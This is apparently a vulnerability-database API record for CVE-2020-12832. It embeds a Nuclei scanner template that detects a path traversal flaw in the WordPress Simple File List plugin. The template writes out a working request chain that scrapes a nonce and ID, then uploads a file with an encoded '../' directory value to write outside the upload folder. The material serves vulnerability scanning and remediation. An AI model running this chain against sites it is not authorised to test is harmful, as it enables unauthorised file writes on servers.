{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2020-12832/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2020-12832/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2020-12832/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2020-12832/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2020-12832/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2020-12832"},"sightings":{"href":"/api/v1/sightings/cve-2020-12832"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2020/CVE-2020-12832.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2020-12832\n\ninfo:\n  name: WordPress Simple File List - Path Traversal\n  author: riteshs4hu\n  severity: critical\n  description: |\n    Simple File List plugin allows path traversal via file upload, enabling files to be written outside the upload directory.\n  impact: |\n    Attackers can delete arbitrary files on the server, potentially causing data loss or service disruption.\n  remediation: |\n    Update to version 4.2.8 or later.\n  reference:\n    - https://wpscan.com/vulnerability/422360b9-4c70-4fd9-9833-375f1294bd7a/\n    - http://nvd.nist.gov/vuln/detail/CVE-2020-12832\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2020-12832\n    epss-score: 0.07073\n    epss-percentile: 0.93935\n    cwe-id: CWE-22\n    cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: Simple File List\n    product: Simple File List WordPress Plugin\n  tags: cve,cve2020,wp,wordpress,wp-plugin,traversal,simple-file-list,lfi,vkev,vuln\n\nvariables:\n  rand: \"{{rand_base(7)}}\"\n\nhttp:\n  - raw:\n      - |\n        GET /?rest_route=/wp/v2/pages&per_page=100 HTTP/1.1\n        Host: {{Hostname}}\n\n    extractors:\n      - type: json\n        name: slug\n        json:\n          - '.[] | select(.content.rendered | contains(\"eeSFL_UploadGo\")) | .slug'\n        internal: true\n\n  - raw:\n      - |\n        GET {{slug}}/ HTTP/1.1\n        Host: {{Hostname}}\n\n    extractors:\n      - type: regex\n        name: sflnonce\n        group: 1\n        regex:\n          - 'name=\"ee-simple-file-list-upload-nonce\"[^>]*?value=\"([A-Za-z0-9]+)\"'\n        internal: true\n\n      - type: regex\n        name: sflid\n        group: 1\n        regex:\n          - 'id=\"eeSFL_ID\">([0-9]+)'\n        internal: true\n\n      - type: regex\n        name: ext\n        group: 1\n        regex:\n          - 'eeSFL_FileFormats\\s*=\\s*\"([A-Za-z0-9]+)'\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytA7kTuCe4IHDaUBZ\n\n        ------WebKitFormBoundarytA7kTuCe4IHDaUBZ\n        Content-Disposition: form-data; name=\"action\"\n\n        sfl_upload_job\n        ------WebKitFormBoundarytA7kTuCe4IHDaUBZ\n        Content-Disposition: form-data; name=\"file\"; filename=\"{{rand}}.{{ext}}\"\n        Content-Type: application/octet-stream\n\n        {{rand}}\n        ------WebKitFormBoundarytA7kTuCe4IHDaUBZ\n        Content-Disposition: form-data; name=\"eeSFL_ID\"\n\n        {{sflid}}\n        ------WebKitFormBoundarytA7kTuCe4IHDaUBZ\n        Content-Disposition: form-data; name=\"eeSFL_FileUploadDir\"\n\n        wp-content%2Fuploads%2Fsimple-file-list%2F..%2F\n        ------WebKitFormBoundarytA7kTuCe4IHDaUBZ\n        Content-Disposition: form-data; name=\"ee-simple-file-list-upload\"\n\n        {{sflnonce}}\n        ------WebKitFormBoundarytA7kTuCe4IHDaUBZ--\n\n  - raw:\n      - |\n        GET /wp-content/uploads/{{rand}}.{{ext}} HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"{{rand}}\")'\n        condition: and\n# digest: 490a0046304402206d546de4d6627f03372d598c5f30894418e82c31b169330468ac76f17ec3ae05022045da0a15d2babdc9ba904601025f9da044361c1f18eb1b81756ed96d5c2b3ffc:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2020-12832"}